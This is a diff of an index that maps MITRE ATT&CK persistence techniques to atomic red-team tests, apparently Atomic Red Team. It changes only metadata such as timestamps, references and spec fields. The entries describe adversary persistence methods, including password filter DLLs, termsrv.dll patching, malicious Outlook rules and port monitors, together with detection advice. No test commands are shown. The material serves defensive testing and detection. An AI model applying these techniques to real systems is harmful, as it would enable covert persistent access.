         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -60878,8 +61252,6 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests:
     - name: Install MS Exchange Transport Agent Persistence
@@ -60927,7 +61299,7 @@ persistence:
         elevation_required: true
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -60953,7 +61325,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -60995,7 +61367,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -61073,11 +61444,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -61157,35 +61527,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -61209,22 +61554,44 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests:
     - name: Install and Register Password Filter DLL
@@ -61322,51 +61689,18 @@ persistence:
         elevation_required: true
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -61375,19 +61709,51 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests:
     - name: Simulate Patching termsrv.dll
@@ -61454,7 +61820,7 @@ persistence:
         name: powershell
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -61546,8 +61912,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -61578,7 +61944,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests:
     - name: Chrome/Chromium (Developer Mode)
@@ -61692,66 +62057,135 @@ persistence:
         elevation_required: true
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -61782,7 +62216,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -61837,8 +62271,6 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests:
     - name: Application Shim Installation
@@ -61927,7 +62359,7 @@ persistence:
         elevation_required: true
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -61988,9 +62420,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -61999,7 +62431,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests:
     - name: Add Port Monitor persistence in Registry
@@ -62076,7 +62507,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -62097,7 +62528,6 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests:
     - name: Logon Scripts - Mac
@@ -62118,7 +62548,7 @@ persistence:
         name: manual
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -62202,11 +62632,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -62219,7 +62648,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -62232,7 +62660,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -62262,7 +62689,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests:
     - name: Shortcut Modification
@@ -62345,7 +62773,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -62367,8 +62795,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -62394,7 +62820,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
